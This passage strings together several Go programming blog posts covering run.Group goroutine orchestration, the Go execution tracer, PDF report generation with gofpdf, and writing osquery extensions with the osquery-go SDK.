func (g *Group) Add(execute func() error, interrupt func(error))
    Add an actor (function) to the group. Each actor must be pre-emptable by
    an interrupt function. That is, if interrupt is invoked, execute should
    return. Also, it must be safe to call interrupt even after execute has
    returned.

    The first actor (function) to return interrupts all running actors. The
    error is passed to the interrupt functions, and is returned by Run.

func (g *Group) Run() error
    Run all actors (functions) concurrently. When the first actor returns,
    all others are interrupted. Run only returns when all actors have
    exited. Run returns the error returned by the first exiting actor.

And here’s how it looks when we apply it to our example.

var g run.Group // the zero value is useful

sm := newStateMachine()
g.Add(func() error { return sm.Run(ctx) }, func(error) { cancel() })

api := newAPI(sm)
server := http.Server{Handler: api}
ln, _ := net.Listen("tcp", ":8080")
g.Add(func() error { return server.Serve(ln) }, func(error) { server.Shutdown(ctx) })

rc := getStreamReadCloser()
g.Add(func() error { return streamProcessor(rc, sm) }, func(error) { rc.Close() })

stop := make(chan struct{})
g.Add(func() error { return signalHandler(stop) }, func(error) { close(stop) })

log.Print(g.Run())

g.Run blocks until all the actors return. In the normal case, that’ll be when someone hits ctrl-C, triggering the signal handler. If something breaks, say the stream processor, its error will be propagated through. In all cases, the first returned error triggers the interrupt function for all actors. And in this way, we can reliably and coherently ensure that every goroutine that’s Added to the group is stopped, when Run returns.

I designed run.Group to help orchestrate goroutines in func main, but I’ve found several other uses since then. For example, it makes a great alternative to a sync.WaitGroup if you’d otherwise have to construct a bunch of scaffolding. Maybe you’ll find some uses, too.
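
For instance, here is a small sketch (the worker function is hypothetical) where run.Group replaces the WaitGroup-plus-quit-channel scaffolding you might otherwise write:

var g run.Group
for i := 0; i < 3; i++ {
	i := i
	done := make(chan struct{})
	g.Add(func() error {
		return worker(i, done) // hypothetical worker that returns when done is closed
	}, func(error) {
		close(done)
	})
}
log.Print(g.Run()) // returns once every worker has exited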

2017-12-23

Introduction

Ever wondered how your goroutines are being scheduled by the go runtime? Ever tried to understand why adding concurrency to your program has not given it better performance? The go execution tracer can help answer these and other questions to help you diagnose performance issues, e.g., latency, contention and poor parallelization.

The tool is available since go 1.5 and works by instrumenting the go runtime for specific events, such as:

  1. Creation, start and end of goroutines
  2. Events that block/unblock goroutines (syscalls, channels, locks)
  3. Network I/O related events
  4. Syscalls
  5. Garbage collection

All this data is collected by the tracer without any kind of aggregation or sampling. In some busy applications this may result in a large file that can be analyzed afterwards by the go tool trace command.

Go already had the pprof memory and CPU profilers before the introduction of the execution tracer, so why was it added to the official toolchain? While the CPU profiler does a nice job of telling you which function is spending the most CPU time, it does not help you figure out what is preventing a goroutine from running, or how goroutines are being scheduled on the available OS threads. That’s precisely where the tracer really shines. The tracer design doc does a pretty good job of explaining the motivations behind the tracer and how it was designed to work.

A tour of Trace

Let’s start with a simple “Hello, world” example for tracing. In this sample, we use the runtime/trace package to start and stop writing trace data to the standard error output.

package main

import (
	"os"
	"runtime/trace"
)

func main() {
	trace.Start(os.Stderr)
	defer trace.Stop()
	// create new channel of type int
	ch := make(chan int)

	// start new anonymous goroutine
	go func() {
		// send 42 to channel
		ch <- 42
	}()
	// read from channel
	<-ch
}

This example creates an unbuffered channel and initializes a goroutine that will send the number 42 over this channel. The main goroutine blocks until the other goroutine sends a value over the channel.

Running this code with go run main.go 2> trace.out sends the tracing output to the file trace.out, which can then be read with: go tool trace trace.out.

Before go 1.8, one needed both the executable binary and the trace data to be able to analyze the trace; for programs compiled with go 1.8 onwards, the trace data contains all the information needed by the go tool trace command.

After running the command, a browser window opens with some options. Each of those opens a different view of the tracer, containing different information about the program’s execution.

Trace

  1. View trace

    The most complex, powerful and interactive visualization shows a timeline of the entire program execution. This view displays, for example, what was running on each of the virtual processors and what was blocked waiting to run. We will dive deeper into this visualization later in this post. This view only works in Chrome.

  2. Goroutine analysis

    Shows how many goroutines of each kind were created during the entire execution. After selecting a kind, it is possible to see information about each goroutine of that kind: for example, how long each goroutine was blocked while trying to acquire a lock on a mutex, reading from the network, running, and so on.

  3. Network/Sync/Syscall blocking profile

    These contain graphs that display how long goroutines spent blocked on each of these resources. They are pretty close to the ones available in the memory/CPU profiles from pprof. This is the perfect place to look when investigating lock contention, for example.

  4. Scheduler latency profiler

    Provides scheduler-level timing information, showing where the most time is spent scheduling.

View Trace

Clicking on the “View trace” link, one is presented with a screen full of information about the whole program execution.

Press “?” to get a list of available shortcuts that help with navigating the trace.

The following image highlights the most important parts and each section is described below:

View trace

  1. Timeline

    Shows the elapsed time of the execution; the units of time may change depending on how far you zoom in. One can navigate the timeline using keyboard shortcuts (WASD keys, just like video games).

  2. Heap

    Shows memory allocations during the execution; this can be really useful for finding memory leaks and checking how much memory the garbage collector is able to free at each run.

  3. Goroutines

    Shows how many goroutines are running and how many are runnable (waiting to be scheduled) at each point in time. A high number of runnable goroutines may indicate scheduling contention, e.g., when the program creates too many goroutines and causes the scheduler to work too hard.

  4. OS Threads

    Shows how many OS threads are being used and how many are blocked by syscalls.

  5. Virtual Processors

    Shows a line for each virtual processor. The number of virtual processors is controlled by the GOMAXPROCS environment variable (defaulting to the number of cores).

  6. Goroutines and events

    Displays where/what goroutine is running on each virtual processor. Lines connecting goroutines represent events. In the example image, we can see that the goroutine “G1 runtime.main” spawned two different goroutines: G6 and G5 (the former is the goroutine responsible for collecting the trace data and the latter is the one we started using the “go” keyword).

    A second row per processor may show additional events such as syscalls and runtime events. This also includes some work that the goroutine does on behalf of the runtime (e.g. assisting the garbage collector).

The image below shows information obtained when selecting a particular goroutine.

View goroutine

This information includes:

  • Its “name” (Title)
  • When it started (Start)
  • Its duration (Wall Duration)
  • The stack trace when it started
  • The stack trace when it finished
  • Events generated by this goroutine

We can see that this goroutine created two events: the tracer goroutine and the goroutine that started to send the number 42 on the channel.

View event

By clicking on a particular event (a line in the graph or by selecting the event after clicking on the goroutine), we can see:

  • The stack trace when the event started
  • The duration of the event
  • Goroutines involved in the event

One may click on these goroutines to navigate to their trace data.

Blocking profiles

Other views available from a trace are the network/synchronization/syscall blocking profiles. Blocking profiles show a graph view similar to those available in the memory/CPU profiles from pprof. The difference is that instead of showing how much memory each function allocated, these profiles show how long each goroutine spent blocked on a particular resource.

The image below shows the “Synchronization blocking profile” for our sample code.

View trace

This shows us that our main goroutine spent 12.08 microseconds blocked receiving from a channel. This kind of graph is a great way to find lock contention, where too many goroutines are competing to obtain a lock on a resource.

Collecting Traces

There are three ways to collect tracing information:

  1. Using the runtime/trace pkg

This involves calling trace.Start and trace.Stop, and was covered in our “Hello, Tracing” example.

  2. Using the -trace=<file> test flag

This is useful to collect trace information about code being tested and the test itself.

  3. Using the debug/pprof/trace handler

This is the best method to collect tracing from a running web application.

Tracing a web application

To be able to collect traces from a running web application written in go, one needs to add the /debug/pprof/trace handler. The following code sample shows how this can be done for the http.DefaultServerMux: by simply importing the net/http/pprof package.

package main

import (
	"net/http"
	_ "net/http/pprof"
)

func main() {
	http.Handle("/hello", http.HandlerFunc(helloHandler))

	http.ListenAndServe("localhost:8181", http.DefaultServeMux)
}

func helloHandler(w http.ResponseWriter, r *http.Request) {
	w.Write([]byte("hello world!"))
}

To collect the traces we need to issue a request to the endpoint, e.g., curl localhost:8181/debug/pprof/trace?seconds=10 > trace.out. This request will block for 10 seconds and the trace data will be written to the file trace.out. A trace generated like this can be viewed the same way as we did before: go tool trace trace.out.

Security note: beware that exposing pprof handlers to the Internet is not advisable. The recommendation is to expose these endpoints on a different http.Server that is only bound to the loopback interface. This blog post discusses the risks and has code samples on how to properly expose pprof handlers.
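
A minimal sketch of that recommendation (the ports are assumptions): keep the application handlers on their own mux, and serve http.DefaultServeMux — where the net/http/pprof import registers its handlers — only on the loopback interface.

package main

import (
	"log"
	"net/http"
	_ "net/http/pprof" // registers /debug/pprof/* on http.DefaultServeMux
)

func main() {
	// pprof (including /debug/pprof/trace) is only reachable via loopback.
	go func() {
		log.Println(http.ListenAndServe("localhost:6060", http.DefaultServeMux))
	}()

	appMux := http.NewServeMux()
	appMux.HandleFunc("/hello", func(w http.ResponseWriter, r *http.Request) {
		w.Write([]byte("hello world!"))
	})
	log.Fatal(http.ListenAndServe(":8181", appMux))
}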

Before gathering the trace, let’s start by generating some load on our service using wrk:

$ wrk -c 100 -t 10 -d 60s http://localhost:8181/hello

This will use 100 connections across 10 threads to make requests for 60 seconds. While wrk is running, we can collect 5s of trace data using curl localhost:8181/debug/pprof/trace?seconds=5 > trace.out. This generated a 5MB file (this can quickly grow if we are able to generate more load) on my 4 CPU machine.

Once again, opening the trace is done by the go tool trace command: go tool trace trace.out. As the tool parses the entire content of the file, this will take longer than our previous example. When it completes, the page looks slightly different:

View trace (0s-2.546634537s)
View trace (2.546634537s-5.00392737s)

Goroutine analysis
Network blocking profile
Synchronization blocking profile
Syscall blocking profile
Scheduler latency profile

To guarantee that the browser will be able to render everything, the tool has divided the trace into two continuous parts. Busier applications or longer traces may require the tool to split this into even more parts.

Clicking on “View trace (2.546634537s-5.00392737s)” we can see that there is a lot going on:

View trace web

This particular screenshot shows a GC run that starts between 1169ms and 1170ms and ends right after 1174ms. During this time, an OS thread (PROC 1) ran a goroutine dedicated to the GC while other goroutines assisted in some GC phases (these are displayed on lines below the goroutine and are labeled MARK ASSIST). By the end of the screenshot, we can see that most of the allocated memory was freed by the GC.

Another particularly useful piece of information is the number of goroutines in the “Runnable” state (13 at the selected time): if this number becomes large over time, it can indicate that we need more CPUs to handle the load.

Conclusions

The tracer is a powerful tool for debugging concurrency issues, e.g., contention and logical races. But it does not solve all problems: it is not the best tool available to track down which piece of code is spending the most CPU time or doing the most allocations. The go tool pprof is better suited for those use cases.

The tool really shines when you want to understand the behavior of a program over time and to know what each goroutine is doing when it is NOT running. Collecting traces may have some overhead and can generate a large amount of data to be inspected.

Unfortunately, official documentation is lacking so some experimentation is needed to try and understand what the tracer is showing. This is also an opportunity for contributions to the official documentation and to the community in general (e.g blog posts).

André is a Sr. Software Engineer at Globo.com, working on Tsuru. @andresantostc on twitter, https://andrestc.com on the web

Reference

  1. Go execution tracer (design doc)
  2. Using the go tracer to speed fractal rendering
  3. Go tool trace
  4. Your pprof is showing
2017-12-22

This article is about how we at Mendelics changed our report system from Python to Go using the gofpdf library, why we made this change, how we planned it, and some insights we got along the way.

Some Context

Before I dive into some technical aspects, let me introduce what Mendelics does. Mendelics is a Brazilian laboratory which processes DNA analyses in order to find genetic diseases. We use a technique called NGS (Next Generation Sequencing) to process blood samples, and at the end of some steps we input all the DNA information into a Go application in a human-readable way.

Our physicians will analyse this data and generate a report, basically a PDF file, which will be sent to the patient after a few days.

Our Architecture

Regarding the reports, our application was split into two parts:

  • A Python API which holds patient data, exam information and other business logic;
  • A Go application used by physicians to analyse medical information and “create the report”;

I put “create the report” in quotes because under the hood the Go application just sends a POST to the Python API to generate it. At this point the Go application doesn’t know how to create a report at all.

Below there is an image which explains it in a better way.

The Python API will use the metadata sent before to create the PDF when the endpoint /report/XPTO is called. In this particular case XPTO is the exam identifier.

Our Problem

The reports were built using Report Lab, a great Python library used by players like NASA and Wikipedia, but the way we used it made changes to the report’s structure a nightmare.

Our reports use a background/foreground structure, which maps to a predefined PDF template (background) and the data you wish to add on top of it (foreground).

Above you can see an example of our background template. It worked for a while, but our requirements changed and our reports got more and more complicated. Every time we need to add or remove a field, for instance, we need to redesign all those kinds of reports because the foreground data needs to be re-aligned over and over again.

Can you imagine other problems that we had using this approach? Let me list a few:

  • Page limit;
  • Text limit;
  • Tables with prefixed rows length;
  • No custom layout;

Our Solution

We want to rewrite it in Go.

Since our main application is written in Go and it’s the only application which needs to know about reports, why not move the report logic to this end? It makes sense, but is there any good Go library out there which is easy to use and handles our known problems well?

The answer is gofpdf.

A great library, ported from PHP, which has good support for everything we needed at the time. So let’s plan this change.

Proof of Concept

We created a new repo to check whether we could reproduce our hardest report using gofpdf and to understand the trade-offs of this new approach.

To start, we fetch it like any other Go library: go get github.com/jung-kurt/gofpdf

With the library downloaded, the code to create our POC is very simple.

We created a function NewReport, and inside it we configured what the document will look like (e.g. font family, font color, page size, header and footer data). Let’s look at it:

func NewReport() *Report {
	pdf := gofpdf.New("P", "mm", "A4", "./assets/fonts")
	html := pdf.HTMLBasicNew()
	encodingFunc := pdf.UnicodeTranslatorFromDescriptor("")

	pdf.AddFont("ProximaNova", "", "ProximaNova-Reg-webfont.json")
	pdf.AddFont("ProximaNova", "B", "ProximaNova-Bold-webfont.json")
	pdf.AddFont("ProximaNova-Light", "", "ProximaNova-Light-webfont.json")

	report := &Report{
		htmlContent:  html,
		encodingFunc: encodingFunc,
	}

	pdf.SetFont("ProximaNova", "", fontPtSize)
	pdf.SetTextColor(75, 75, 80)
	pdf.AliasNbPages("")
	pdf.SetHeaderFunc(report.headerFunc)
	pdf.SetFooterFunc(report.footerFunc)

	report.document = pdf
	return report
}

Our Report struct just holds the configured document, as you can see in the last line before we actually return it.
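
The Report struct itself isn’t shown in this post; based on the fields set in NewReport above, a minimal version of it might look like the sketch below (the field names are assumptions, and headerFunc/footerFunc would be methods defined on the same struct):

// A guess at the Report struct, inferred from NewReport; the real definition may differ.
type Report struct {
	document     *gofpdf.Fpdf         // the configured PDF document
	htmlContent  gofpdf.HTMLBasicType // helper for writing simple HTML snippets
	encodingFunc func(string) string  // translates UTF-8 strings to the PDF's encoding
}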

The idea here is just to show how simple it is to create documents with this library. You can check the docs to understand what each function does. Let’s move one step further.

The main code lives in an http.HandleFunc, created just so we can see the PDF in a browser instead of generating it on the file system.

http.HandleFunc("/report", func(w http.ResponseWriter, r *http.Request) {
    report := NewReport()
    report.PatientHeader()
    report.Diagnostic()
    report.GeneList()
    report.TechnicalResponsible()
    report.Method()
    report.QualityFlags()
    report.VUS()
    report.Comments()

    if err := report.document.Output(w); err != nil {
        log.Print(err)
    }
})

Each function on the report object (created by NewReport, as we saw above) builds the section of that name. We build the patient header, with information like name, age, etc.; the diagnostic section, where we explain whether the patient has a positive or negative result for that specific exam; and so on.

Let’s take the Method function to see how it works under the hood.

func (r *Report) Method() {
	fs := 10.0
	r.document.SetFontSize(fs)

	content := "Captura de exons com Nextera Exome Capture seguida por sequenciamento de nova " +
		"geração com Illumina HiSeq. Alinhamento e identificação de variantes utilizando protocolos " +
		"de bioinformática, tendo como referência a versão GRCh37 do genoma humano. Análise médica " +
		"orientada pelas informações que motivaram a realização deste exame."

	r.drawLine(fs, "<b>Método</b>", 10)

	// MultiCell(width, height, content, border, align, fill)
	r.document.MultiCell(0, 5, r.encodingFunc(content), "", "", false)
	r.lineStroke()
}

We just set the font size for that section, build its text and add it to the document using the MultiCell function. Easy! No x/y alignment, no text limits, etc. The library handles it based on the configuration we did earlier in NewReport.
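
The drawLine and lineStroke helpers aren’t shown in the post. Purely as an illustration of what such helpers could do with the gofpdf API, here is one hypothetical take (not the author’s actual code):

// Hypothetical implementations of the helpers used in Method above.
func (r *Report) drawLine(fontSize float64, html string, lineHeight float64) {
	// Render a short HTML snippet (e.g. a bold section title) at the current cursor position.
	r.document.SetFontSize(fontSize)
	r.htmlContent.Write(lineHeight, r.encodingFunc(html))
	r.document.Ln(lineHeight)
}

func (r *Report) lineStroke() {
	// Draw a thin horizontal rule under the section that was just written.
	width, _ := r.document.GetPageSize()
	y := r.document.GetY()
	r.document.Line(10, y, width-10, y) // assumes the default 10mm side margins
	r.document.Ln(4)
}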

Going back to the main function, at the end we write the final document back to the ResponseWriter and we’re done!

Below you can see the result of this POC: a report 99% similar to what we had in Python, in just 351 LOC:

From Python to Go

As we saw previously, we needed to change how Python and Go communicate with each other. Instead of sending an application/pdf as before, the Python API now needs to serve all the data required to construct the report on the Go side.

We created a new endpoint to serve this new information, as we can see below:

With the API ready, we changed how our Go application calls it. Instead of asking the API to build the report, we now call the model endpoint to get the metadata necessary to construct the report on our end.

model, err := api.GetModel(code, user)

if err != nil {
    msg := "unable to get report model"
    logrus.WithFields(logrus.Fields{
        "code":  code,
        "user":  user,
        "error": err,
    }).Error(msg)
    http.Error(w, msg, http.StatusInternalServerError)
    return
}

After that we pass this data to our report object:

if err := report.New(model).Output(w); err != nil {
    msg := "unable to generate report"
    logrus.WithFields(logrus.Fields{
        "code":  code,
        "error": err,
    }).Error(msg)
    http.Error(w, msg, http.StatusInternalServerError)
}

Did you notice how similar this code is to the one from our POC? Yes, you got it right: we basically copied and pasted the code from the POC into our application and removed the hardcoded parts related to how we build each section. The Output function is pretty much the same:

func (r *Report) Output(w io.Writer) error {
	if err := r.Error(); err != nil {
		r.document.SetError(err)
		return r.document.Output(w)
	}

	r.patientHeader()
	r.diagnostic()
	r.geneList()
	r.method()
	r.qualityFlags()
	r.vusSection()
	r.comments()
	r.additionalInformation()

	return r.document.Output(w)
}

Bonus: Unit Test For PDF

Your methods for building each PDF section are fully tested, but what if you change something like a font color, an image position or another visual detail? How can you get feedback about it?

In our case, let’s say we accidentally change the color of an arbitrary element. The correct document was:

and now it looks like this:

The Mistake

We changed the background color of an element in the right corner.

Without unit tests we would need to check every document by eye to guarantee we didn’t break anything, but the library provides an awesome way to test our PDF files! Check the unit tests inside the library to get the whole idea.

On our end, the tests will alert us if we make a mistake like the one above.
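
As an illustration, a minimal golden-file test could compare the generated bytes against a reference PDF checked into the repo (testdata/report_golden.pdf is a hypothetical path and the package name is an assumption; this is a sketch, not our actual test suite). Raw byte comparison is brittle because PDFs embed metadata such as creation timestamps, so in practice the comparison helpers used in gofpdf’s own tests, which ignore those fields, are a better fit.

package report

import (
	"bytes"
	"io/ioutil"
	"testing"
)

// TestReportMatchesGolden regenerates the report and compares it against a
// previously approved reference file.
func TestReportMatchesGolden(t *testing.T) {
	report := NewReport()
	report.Method() // build one section, just for the example

	var buf bytes.Buffer
	if err := report.document.Output(&buf); err != nil {
		t.Fatalf("generating report: %v", err)
	}

	golden, err := ioutil.ReadFile("testdata/report_golden.pdf")
	if err != nil {
		t.Fatalf("reading golden file: %v", err)
	}
	if !bytes.Equal(buf.Bytes(), golden) {
		t.Error("generated report differs from testdata/report_golden.pdf")
	}
}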

Conclusion

I strongly recommend gofpdf if you need to build PDFs in Go.

Also, today we can create any kind of project using Go, not just CLIs and APIs, and even code that doesn’t need to rely on channels and goroutines to get the job done.

I’m very happy with the Go ecosystem so far, and I’m looking forward to seeing what the community builds with it.

2017-12-21

What if you could use SQL to query any aspect of your infrastructure? Osquery, an open source instrumentation tool released by the Facebook security team, allows you to do just that.

For example, SELECT network_name, last_connected, captive_portal FROM wifi_networks WHERE captive_portal=1; will show all captive portal WiFi networks that a laptop has connected to. And SELECT * FROM processes WHERE on_disk = 0; will show any running process whose binary has been deleted from disk. When the root password vulnerability became known a few weeks ago, the osquery community quickly crafted a query which would identify vulnerable Macs in a fleet of devices. With almost 200 tables available by default and support for macOS, Linux and Windows hosts, osquery is the tool of choice for many security and system administration teams.

Osquery is a powerful tool, but it’s written in C++, so why are we talking about it in a GopherAcademy post? Osquery uses Thrift (a project similar to gRPC) to allow developers to extend osquery through a series of plugin types. Earlier this year our team at Kolide released a set of Go packages with idiomatic interfaces that allow anyone to use the full power of Go to extend osquery. In this blog post, it’s my goal to show you how you can get started with osquery development using the osquery-go SDK.

Writing a custom logger plugin

When a scheduled query like SELECT name, version from deb_packages is executed, the osqueryd daemon will create a JSON log event with the results of the query. By default, a filesystem plugin is used, which logs the results to a local file. Commonly, osquery users use aggregation tools like filebeat to send the result logs to a centralized log platform. Other plugins exist too. The tls plugin sends all logs to a remote TLS server like Fleet. The kinesis plugin sends log results to AWS, allowing advanced monitoring with applications like StreamAlert. But what if you already have a well-established logging pipeline built on the systemd journal, Splunk, fluentd or any number of proprietary logging systems? With the Thrift bindings to osquery, you can write your own logger. Go, having support for most APIs these days, is an ideal language for implementing one.

For the purpose of this tutorial, we’ll implement a systemd journal logger. The go-systemd library from CoreOS has a convenient package we can use to write to journald.

The github.com/kolide/osquery-go/plugin/logger package exposes the following API which we need to implement.

type Plugin struct {}

type LogFunc func(ctx context.Context, typ LogType, log string) error

func NewPlugin(name string, fn LogFunc) *Plugin

To create our own logger, we have to implement a function that satisfies the signature of LogFunc.

For journald the function looks like this:

func JournalLog(_ context.Context, logType logger.LogType, logText string) error {
        return journal.Send(
                logText,
                journal.PriInfo,
                map[string]string{"OSQUERY_LOG_TYPE": logType.String()},
        )
}

Now we can call logger.NewPlugin("journal", JournalLog) to get back a functioning osquery plugin we can register with the Thrift extension server.

Configuring osquery to use our custom extension

We have implemented a logger plugin, but we still have to link it to osqueryd. Osquery has a few specific requirements for registering plugins. Plugins must be packaged as executables, called extensions. A single extension can bundle one or more plugins. We’ll use a package main to create an extension.

Osquery will call our extension with 4 possible CLI flags, the most important of which is the unix socket we’ll use to communicate back to the process.

        var (
                flSocketPath = flag.String("socket", "", "")
                flTimeout    = flag.Int("timeout", 0, "")
                _            = flag.Int("interval", 0, "")
                _            = flag.Bool("verbose", false, "")
        )
        flag.Parse()

We’ll ignore the interval and verbose flags in this extension, but they still have to be parsed to avoid an error.

Next, we’ll add time.Sleep(2 * time.Second) to wait for the unix socket to become available. In production code we would add a retry with a backoff.
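
A rough sketch of what such a retry could look like (waitForSocket is a hypothetical helper, not part of the SDK; it needs the fmt, os and time imports):

// waitForSocket polls for the extension socket with exponential backoff.
func waitForSocket(path string, maxAttempts int) error {
	wait := 200 * time.Millisecond
	for i := 0; i < maxAttempts; i++ {
		if _, err := os.Stat(path); err == nil {
			return nil
		}
		time.Sleep(wait)
		wait *= 2
	}
	return fmt.Errorf("socket %s not available after %d attempts", path, maxAttempts)
}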

Once the socket file is available, we can bind to it by creating an ExtensionManagerServer. The extension will use the socket path provided to us by the osquery process.

        server, err := osquery.NewExtensionManagerServer(
                "go_extension_tutorial",
                *flSocketPath,
                osquery.ServerTimeout(time.Duration(*flTimeout)*time.Second),
        )
        if err != nil {
                log.Fatalf("Error creating extension: %s\n", err)
        }

Next, we can create our logger and register it with the server.

       journal := logger.NewPlugin("journal", JournalLog)
       server.RegisterPlugin(journal)

Finally, we can run the extension. The server.Run() method will block until an error is returned.

      log.Fatal(server.Run())
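
For reference, here is a minimal func main assembling the snippets above into one file (a sketch; it assumes the JournalLog function from earlier in the post):

package main

import (
	"flag"
	"log"
	"time"

	osquery "github.com/kolide/osquery-go"
	"github.com/kolide/osquery-go/plugin/logger"
)

func main() {
	var (
		flSocketPath = flag.String("socket", "", "")
		flTimeout    = flag.Int("timeout", 0, "")
		_            = flag.Int("interval", 0, "")
		_            = flag.Bool("verbose", false, "")
	)
	flag.Parse()

	// Wait for osqueryd to create the extension socket (see the retry sketch above).
	time.Sleep(2 * time.Second)

	server, err := osquery.NewExtensionManagerServer(
		"go_extension_tutorial",
		*flSocketPath,
		osquery.ServerTimeout(time.Duration(*flTimeout)*time.Second),
	)
	if err != nil {
		log.Fatalf("Error creating extension: %s\n", err)
	}

	// Register the journald logger and serve until an error occurs.
	server.RegisterPlugin(logger.NewPlugin("journal", JournalLog))
	log.Fatal(server.Run())
}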

Now that we’ve created our package main, we can build the binary and start osqueryd with the custom logger. Osquery has a few requirements for extension executables that we have to follow:

  • The executable must have a .ext file extension.
  • The executable path should be added to an extensions.load file which can be passed to the osqueryd --extensions_autoload CLI flag.
  • The extension must be owned by the same user that is running osquery, and the permissions must be read+exec only. This is a precaution against an attacker replacing an extension executable that a root osqueryd process would run. For development, you can use the --allow_unsafe flag, but we won’t need it here since we’ll be running the osquery process as our current user account.

Putting it all together we get:

echo "$(pwd)/build/tutorial-extension.ext" > /tmp/extensions.load
go build -i -o build/tutorial-extension.ext
osqueryd \
  --extensions_autoload=/tmp/extensions.load \
  --pidfile=/tmp/osquery.pid \
  --database_path=/tmp/osquery.db \
  --extensions_socket=/tmp/osquery.sock \
  --logger_plugin=journal

Immediately we can see our logger working with journalctl:

sudo journalctl OSQUERY_LOG_TYPE=status -o export -f |awk -F'MESSAGE=' '/MESSAGE/ {print $2}'

{"s":0,"f":"events.cpp","i":825,"m":"Event publisher not enabled: audit: Publisher disabled via configuration","h":"dev","c":"Mon Dec 18 03:34:31 2017 UTC","u":1513568071}
{"s":0,"f":"events.cpp","i":825,"m":"Event publisher not enabled: syslog: Publisher disabled via configuration","h":"dev","c":"Mon Dec 18 03:34:31 2017 UTC","u":1513568071}
{"s":0,"f":"scheduler.cpp","i":75,"m":"Executing scheduled query foobar: SELECT 1","h":"dev","c":"Mon Dec 18 03:34:38 2017 UTC","u":1513568078}

Adding tables to osquery

Loggers are great, but what if we need to implement a custom table? Let’s stick with the go-systemd package and prototype a systemd table which will list the systemd units and their state.

The github.com/kolide/osquery-go/plugin/table package has a similar API to that of the logger plugin.

type Plugin struct {}

type GenerateFunc func(ctx context.Context, queryContext QueryContext) ([]map[string]string, error)

type ColumnDefinition struct {
    Name string
    Type ColumnType
}

func NewPlugin(name string, columns []ColumnDefinition, gen GenerateFunc) *Plugin

The ColumnDefinition struct describes a column, and four SQL column types are supported: TEXT, INTEGER, BIGINT and DOUBLE. To create the table, we’ll have to implement the GenerateFunc, which returns the table contents as a []map[string]string.

We’ll implement the required Generate function using the dbus package, which has a helpful ListUnits() method.

Note: I’m using package globals and ignoring errors to keep the example code short. The full implementation is linked at the end of this post.

var conn *dbus.Conn

func generateSystemdUnitStatus(_ context.Context, _ table.QueryContext) ([]map[string]string, error) {
        units, _ := conn.ListUnits()
        var results []map[string]string
        for _, unit := range units {
                // get the pid value
                var pid int
                p, _ := conn.GetServiceProperty(unit.Name, "MainPID")
                pid = int(p.Value.Value().(uint32))

                // get the stdout path of the service unit
                var stdoutPath string
                p, _ = conn.GetServiceProperty(unit.Name, "StandardOutput")
                stdoutPath = p.Value.String()

                //... a few more getters like this
                // then populate the table rows
                results = append(results, map[string]string{
                        "name":         unit.Name,
                        "load_state":   unit.LoadState,
                        "active_state": unit.ActiveState,
                        "exec_start":   execStart,
                        "pid":          strconv.Itoa(pid),
                        "stdout_path":  stdoutPath,
                        "stderr_path":  stderrPath,
                })
        }
        return results, nil
}

Now we can create the osquery-go *table.Plugin:

func SystemdTable() *table.Plugin {
        columns := []table.ColumnDefinition{
                table.TextColumn("name"),
                table.IntegerColumn("pid"),
                table.TextColumn("load_state"),
                table.TextColumn("active_state"),
                table.TextColumn("exec_start"),
                table.TextColumn("stdout_path"),
                table.TextColumn("stderr_path"),
        }
        return table.NewPlugin("systemd", columns, generateSystemdUnitStatus)
}

Back in our func main, we can register this plugin with the server, similar to how we registered the logger plugin.

systemd := SystemdTable()
server.RegisterPlugin(systemd)

We can now use the systemd table in our queries.

osquery> SELECT process.start_time, systemd.name AS service, process.name, listening.address, listening.port, process.pid FROM processes AS process JOIN listening_ports AS listening ON (process.pid = listening.pid) JOIN systemd ON systemd.pid = process.pid and listening.port = 443;
+------------+------------------+----------+---------+------+-------+
| start_time | service          | name     | address | port | pid   |
+------------+------------------+----------+---------+------+-------+
| 6308708    | nginx.service    | nginx    | ::      | 443  | 25859 |
+------------+------------------+----------+---------+------+-------+

By configuring the query to run on a schedule, and using the logger plugin to aggregate the results centrally, we can begin to instrument our systems and create alerts.

Speaking of configuration, how are you configuring the osquery process? The recommended way is a configuration management tool like Chef, or a dedicated TLS server like Fleet, but maybe you’ve got custom requirements?

Config plugins for osquery

Just like you can log results with a custom logger, you can load configuration through a custom plugin. We’ll implement a plugin which configures the osquery process and schedules a list of queries to run. To keep things simple, we’ll load the configuration from a GitHub gist.

By now, you can probably guess what the API of the github.com/kolide/osquery-go/plugin/config package looks like.

type Plugin struct {}

type GenerateConfigsFunc func(ctx context.Context) (map[string]string, error)

func NewPlugin(name string, fn GenerateConfigsFunc) *Plugin

Here, we implement the GenerateConfigs function to return one or more config sources as a map, where each value represents the full config JSON file as a string.

var client *github.Client

func GenerateConfigs(ctx context.Context) (map[string]string, error) {
        gistID := os.Getenv("OSQUERY_CONFIG_GIST")

        gist, _, err := client.Gists.Get(ctx, gistID)
        if err != nil {
                return nil, errors.Wrap(err, "get config gist")
        }
        var config string
        if file, ok := gist.Files["osquery.conf"]; ok {
                config = file.GetContent()
        } else {
                return nil, fmt.Errorf("no osquery.conf file in gist %s", gistID)
        }
        return map[string]string{"gist": config}, nil
}

One thing I want to highlight here is that our plugin needs its own configuration.

gistID := os.Getenv("OSQUERY_CONFIG_GIST")

You might need to provide configuration like API keys to your plugin, and environment variables provide a convenient way of doing that.
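
For example, the package-level client used by GenerateConfigs could be wired up from the environment as well (a sketch; GITHUB_TOKEN is an assumed variable name, and it needs the context, os, go-github and oauth2 imports):

func init() {
	// Public gists can be fetched anonymously; a token raises the rate limit
	// and allows access to private gists.
	if token := os.Getenv("GITHUB_TOKEN"); token != "" {
		ts := oauth2.StaticTokenSource(&oauth2.Token{AccessToken: token})
		client = github.NewClient(oauth2.NewClient(context.Background(), ts))
		return
	}
	client = github.NewClient(nil)
}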

Now that we’ve created the plugin, the only thing left to do is register it inside func main and restart osqueryd.

gistConfig := config.NewPlugin("gist", GenerateConfigs)
server.RegisterPlugin(gistConfig)

Restart the osqueryd daemon with two new flags: a refresh interval (in seconds) and the config plugin to use instead of the default filesystem one.

--config_refresh=60 \
--config_plugin=gist

Conclusion

In this article I’ve given an overview of osquery and shown how to use the Go plugin SDK to write your own custom extensions. Besides creating the plugins, we also have to think about packaging, distribution, and the platforms we’re running the osquery daemon on. For example, the journal and systemd APIs are not available on macOS or Windows, so we have to compile our custom extensions differently for each platform. Once again, Go makes this process easy by allowing us to use build tags when writing platform-specific plugins.

At Kolide, we’ve been writing our own open source osqueryd extension called Launcher. Launcher implements config, logger and other plugins for osquery, using gRPC and the Go kit toolkit to effectively manage osqueryd at scale in various environments. If you’ve found this article interesting, I encourage you to check out the Launcher source. The osquery project has a vibrant community of users and developers, most of whom hang out on Slack. In addition to the Go SDK, a similar one is available for Python.

